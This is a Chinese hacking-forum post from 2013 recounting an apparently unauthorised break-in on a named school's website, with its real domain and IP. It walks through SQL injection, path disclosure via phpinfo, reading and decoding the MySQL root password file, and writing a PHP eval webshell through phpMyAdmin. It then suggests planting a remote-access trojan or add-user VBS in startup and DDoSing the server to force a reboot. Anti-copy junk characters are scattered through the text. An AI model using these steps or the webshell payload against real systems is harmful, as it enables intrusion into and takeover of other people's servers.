找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2738|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏/ r2 d' W4 D+ f. j
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
7 @/ s- [! h+ j8 b% u) A" w$ H; }$ i& @; p4 |/ D* c! R; M1 J
1 ^! r* T' u1 s7 c
5 T! n- f5 G  k+ R" }5 a6 R
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 0 O* z, p! i9 T. F  D$ ~% ]0 g

1 D9 n9 I$ R! ?0 d8 Q那么想可以直接写入shell ,getshell有几个条件:
5 ]" H! s' C/ y/ ?& R! C2 [; D
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF4 r0 i: N/ F, L9 z$ [/ k# h; w

( Y# I! w2 r+ h/ x) R% G9 q试着爆绝对路径:! v* }% p4 [! R9 O% m, l2 A# o
1./phpMyAdmin/index.php?lang[]=1  
( j2 w% U- s7 f3 \; U2./phpMyAdmin/phpinfo.php  2 z# l9 M$ @2 o! W- E$ g4 l9 w9 i; z
3./load_file()  
1 L9 S& w& g# P/ ?1 p! k1 P9 e" k8 o; h4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
- y  w2 ?3 r# l2 v5./phpmyadmin/libraries/select_lang.lib.php  
# T7 n8 _& y6 ]; T  a- `6./phpmyadmin/libraries/lect_lang.lib.php  
2 T- a- \) e# c2 W7 E- s- c0 O7./phpmyadmin/libraries/mcrypt.lib.php   
$ Z1 C3 B3 B0 S2 N- C, K8./phpmyadmin/libraries/export/xls.php  ) f1 Q6 ?2 u3 k  V
' V$ d0 n$ h& F9 R2 v4 Y* O! _- `3 Y: Z
均不行...........................
5 {& O; B- f% j6 P$ W# C1 n
% A- Q9 J2 b: V4 [- N( m御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
$ i7 x/ r! a7 A, t0 D  L
7 m3 U2 w4 t3 s4 ]6 _& q权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 1 l( S* w1 C9 U  C8 }

5 d# |; ?% z4 Z. b  c6 l默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
3 A* f( G. ~1 r" R) F9 q( p+ n" p4 ]+ @) [% L2 ]
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
9 z1 i' U+ B% U5 F
: V- R$ p7 u3 y# q$ P想想root还可以读,读到root密码进phpmyadmin 也可以拿shell - H2 B7 J2 O6 _
* L4 G$ |3 v1 r; k- j& Q! L4 x
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
2 t% e9 w* O4 A4 k1 t  C" s$ P* p5 J7 A8 Y# e) q: h+ U0 F
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 6 W1 M: n; x. z1 C$ E

' g$ M8 J/ H0 f) x3 N/ \& ]成功读到root密码:
) U. v' i- o# B  k8 }5 Q/ Z+ _' c% o- ^. M; K3 d
17---- r(0072)
$ L7 p9 J& M+ p7 k18---- o(006f)
; n6 ]6 d1 O" d: J8 M19---- o(006f)% ~( V  t) \/ k8 W9 m3 [) f
20---- t(0074)
8 `+ h7 d& q2 i# c' E# W/ y' u21---- *(002a)
6 H5 w3 B. @6 X22---- 8(0038)  v! d9 I5 A! y: K' o2 a: o/ K0 T
23---- 2(0032)7 W; W& o+ d/ z2 l, Z
24---- E(0045). V& M* w* p' _: l% v& @) o
25---- 1(0031)
( l2 s& C6 F5 L; q1 M- p% j. @% [) \26---- C(0043). S% k+ j& `( G# \- u; y0 n1 z9 z
27---- 5(0035)* \( X5 C' q8 T& R/ |  X! U
28---- 8(0038)) x: S$ u! Z8 s3 B+ f2 t# Q
29---- 2(0032)
9 {& q  v& W4 E9 p30---- 8(0038)
/ _: a) f9 i0 S: V( F( e. i; B31---- A(0041)3 X& L! b8 @" C1 P0 Y: `
32---- 9(0039)' e1 o: E( m; ]0 [, z
33---- B(0042)
' B6 h6 `: D0 i34---- 5(0035)
4 [2 i- U* W5 e- u" p7 d( P2 K35---- 4(0034)9 f  {& m$ [7 o1 v! M/ Z
36---- 8(0038). U0 v: N0 `7 i3 {* L8 k  u3 l
37---- 6(0036)
0 v- w* L+ U7 s3 L' A38---- 4(0034)
+ g# C) K( J, @9 y' k; i; }39---- 9(0039)
3 O, w/ W7 m/ @; L, z# }/ b40---- 1(0031)
/ J( O6 u% T" C! F: J5 K0 Q41---- 1(0031)
9 o0 D9 E2 p+ p2 t: u42---- 5(0035), R: `. ^2 p6 y7 |" S( y0 d
43---- 3(0033)
$ \4 |% F' d7 f9 O9 `  [0 k2 r44---- 5(0035). W0 n6 r1 X# e# O
45---- 9(0039)
) v+ f; \2 w5 H7 X* a46---- 8(0038)& ]- N1 h# H$ ]* p* l8 [, B5 X
47---- F(0046)+ N. n2 k1 E/ [  `/ A  E* o, S
48---- F(0046)
6 `3 ^' h' E. a0 m4 c49---- 4(0034)+ a8 [! v' F2 U! o( y( H( l0 j
50---- F(0046)
; l1 s6 }9 S3 U' I; }2 L7 B; a: }0 f/ |51---- 0(0030)# P. f. t9 P$ _/ X( u5 c
52---- 3(0033), m6 H- e8 M' S3 I
53---- 2(0032)
( E  H, e+ r  H7 o( [/ t54---- A(0041)) g) I' ?; w! Y+ @- H+ ?2 L) F# n, W
55---- 4(0034)/ L2 y. E) d# B" Z; c( ~- w0 E3 T
56---- A(0041)% d/ i! s  }/ ], V8 k/ [
57---- B(0042)# p6 A. f* ~2 I$ O# Y( K" k: v
58---- *(0044)
4 g' w% v6 b' A- u59---- *(0035)
8 v1 O9 ^7 v  B+ w60---- *(0041)9 f7 a7 O0 g* O+ V4 O, t& w. P2 i
61---- *0032). q. S& J0 K8 ]) r9 a
# e# \6 z0 D! a5 m9 F5 t$ O  J5 V
解密后成功登陆phpmyamin
* E* a; b3 {6 |/ n3 `2 q) s2 Z                          
( \  u: |: j4 d8 a5 |
" D% j( K* L' R' I1 ?9 _  _: ?                             + B9 p4 o- T) H/ \6 R

$ O/ Z4 {) @2 @- H* l5 W2 h找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
8 E! p/ W# _, N" l9 y( M
! I) l  d0 h; E4 l& P  M2 o! q! v# H成功执行,拿下shell,菜刀连接:
8 A, Z1 V. M& {: u! v3 D$ |5 O8 P" D; D' t7 @6 B! d$ C
服务器不支持asp,aspx,php提权无果...................
9 p1 h$ i1 `3 d' p
" v$ G% l& H$ m) G: |# W* R但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
; L3 R' _8 d9 z" m: h
服务器上已经有个隐藏帐号了
  |( J) _  `; s+ B5 I7 B
别名     administrators7 ?+ z% q2 u* i, f+ V" `0 p
注释     管理员对计算机/域有不受限制的完全访问权
; m" t& o* R. \9 Q* }
成员

7 C/ u/ h: z1 q! h5 |
-------------------------------------------------------------------------------
# A" g( l, n6 D8 Tadmin- ?  d' Q1 t) w9 r3 p- w
Administrator
8 C- V. p7 {* Z0 Nslipper$5 F1 F0 X& r- W+ |6 j
sqluser
4 @5 {7 j9 G# V4 A1 t3 R& v6 T0 c2 D! n命令成功完成。 , F, h2 q8 o; [

& H. R- H9 b3 ~( ]6 ^( ^& v3 ~服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。5 R& N2 y4 j& |. V0 [5 \) \8 F  Y

# t6 J! o8 v+ `ddos服务器重启,不然就只能坐等服务器重启了...............................
5 M2 S% r- }. P6 T6 ?% `1 s" X7 ?- E' X: j
      
3 d) d5 k8 `9 M

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表